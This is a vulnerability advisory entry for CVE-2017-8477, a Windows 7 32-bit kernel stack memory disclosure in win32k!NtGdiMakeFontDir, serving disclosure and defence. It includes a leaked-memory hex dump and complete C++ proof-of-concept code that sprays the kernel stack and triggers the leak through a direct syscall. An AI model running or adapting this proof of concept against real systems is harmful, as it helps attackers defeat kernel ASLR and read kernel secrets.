Windows Kernel stack memory disclosure in win32k!NtGdiMakeFontDir(CVE-2017-8477)

2017-06-27T00:00:00
ID SSV:96235
Type seebug
Reporter Root
Modified 2017-06-27T00:00:00

Description

We have discovered that the win32k!NtGdiMakeFontDir system call discloses large portions of uninitialized kernel stack memory to user-mode clients.

The attached proof of concept code (which is specific to Windows 7 32-bit) works by first filling a large portion of the kernel stack with a controlled marker byte 0x41 ('A') using the nt!NtMapUserPhysicalPages system call, and then invoking the affected win32k!NtGdiMakeFontDir syscall. As a result, we can observe that a number of leftover bytes from the stack are indeed leaked to user-mode via the output structure: --- cut --- 00000000: 01 00 00 00 00 02 95 00 00 00 57 69 6e 64 6f 77 ..........Window 00000010: 73 21 20 57 69 6e 64 6f 77 73 21 20 57 69 6e 64 s! Windows! Wind 00000020: 6f 77 73 21 00 10 03 01 01 00 00 00 00 00 00 00 ows!............ 00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000040: 00 00 00 00 00 00 03 40 00 08 48 00 48 00 66 06 .......@..H.H.f. 00000050: 00 00 1b 02 00 00 00 f4 01 00 00 00 00 08 07 e8 ................ 00000060: 03 86 02 1f a8 01 02 00 00 00 00 00 00 76 00 00 .............v.. 00000070: 00 08 00 00 00 41 77 69 6e 65 5f 74 65 73 74 00 .....Awine_test. 00000080: 77 69 6e 65 5f 74 65 73 74 00 4d 65 64 69 75 6d wine_test.Medium 00000090: 00 41 41 41 41 00 41 41 41 41 41 41 41 41 41 41 .AAAA.AAAAAAAAAA 000000a0: 41 41 41 41 41 41 41 41 41 00 41 41 41 41 41 41 AAAAAAAAA.AAAAAA 000000b0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 00 AAAAAAAAAAAAAAA. 000000c0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000000d0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000000e0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 000000f0: 41 41 41 41 41 41 41 41 41 41 41 ?? ?? ?? ?? ?? AAAAAAAAAAA..... --- cut --- In order for the PoC program to work, the attached wine_test.ttf font must be present in the current working directory.

Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.

NtGdiMakeFontDir.cpp ```

include <Windows.h>

include <winternl.h>

include <cstdio>

extern "C" ULONG WINAPI NtMapUserPhysicalPages( PVOID BaseAddress, ULONG NumberOfPages, PULONG PageFrameNumbers );

// For native 32-bit execution. extern "C" ULONG CDECL SystemCall32(DWORD ApiNumber, ...) { asm{mov eax, ApiNumber}; asm{lea edx, ApiNumber + 4}; __asm{int 0x2e}; }

VOID PrintHex(PBYTE Data, ULONG dwBytes) { for (ULONG i = 0; i < dwBytes; i += 16) { printf("%.8x: ", i);

for (ULONG j = 0; j &lt; 16; j++) {
  if (i + j &lt; dwBytes) {
    printf("%.2x ", Data[i + j]);
  }
  else {
    printf("?? ");
  }
}

for (ULONG j = 0; j &lt; 16; j++) {
  if (i + j &lt; dwBytes && Data[i + j] &gt;= 0x20 && Data[i + j] &lt;= 0x7e) {
    printf("%c", Data[i + j]);
  }
  else {
    printf(".");
  }
}

printf("\n");

} }

VOID MyMemset(PBYTE ptr, BYTE byte, ULONG size) { for (ULONG i = 0; i < size; i++) { ptr[i] = byte; } }

VOID SprayKernelStack() { // Buffer allocated in static program memory, hence doesn't touch the local stack. static BYTE buffer[4096];

// Fill the buffer with 'A's and spray the kernel stack. MyMemset(buffer, 'A', sizeof(buffer)); NtMapUserPhysicalPages(buffer, sizeof(buffer) / sizeof(DWORD), (PULONG)buffer);

// Make sure that we're really not touching any user-mode stack by overwriting the buffer with 'B's. MyMemset(buffer, 'B', sizeof(buffer)); }

int main() { // Windows 7 32-bit. CONST ULONG __NR_NtGdiMakeFontDir = 0x10eb;

// Convert thread to GUI. LoadLibrary(L"user32.dll");

// Get the current directory, and built an NT path to the source TTF file. TCHAR CurrentDirectory[MAX_PATH]; if (!GetCurrentDirectory(sizeof(CurrentDirectory), CurrentDirectory)) { printf("GetCurrentDirectory failed, %d\n", GetLastError()); return 1; }

TCHAR FontPath[MAX_PATH]; _snwprintf_s(FontPath, sizeof(FontPath), L"\??\%s\wine_test.ttf", CurrentDirectory);

// Spray the kernel stack to get visible results of the memory disclosure. SprayKernelStack();

// Trigger the bug and display the output. BYTE output[0xfb] = { / zero padding / }; if (!SystemCall32(__NR_NtGdiMakeFontDir, 0, output, sizeof(output), FontPath, (wcslen(FontPath) + 1) * sizeof(TCHAR))) { printf("NtGdiMakeFontDir failed\n"); return 1; }

PrintHex(output, sizeof(output));

return 0; } ```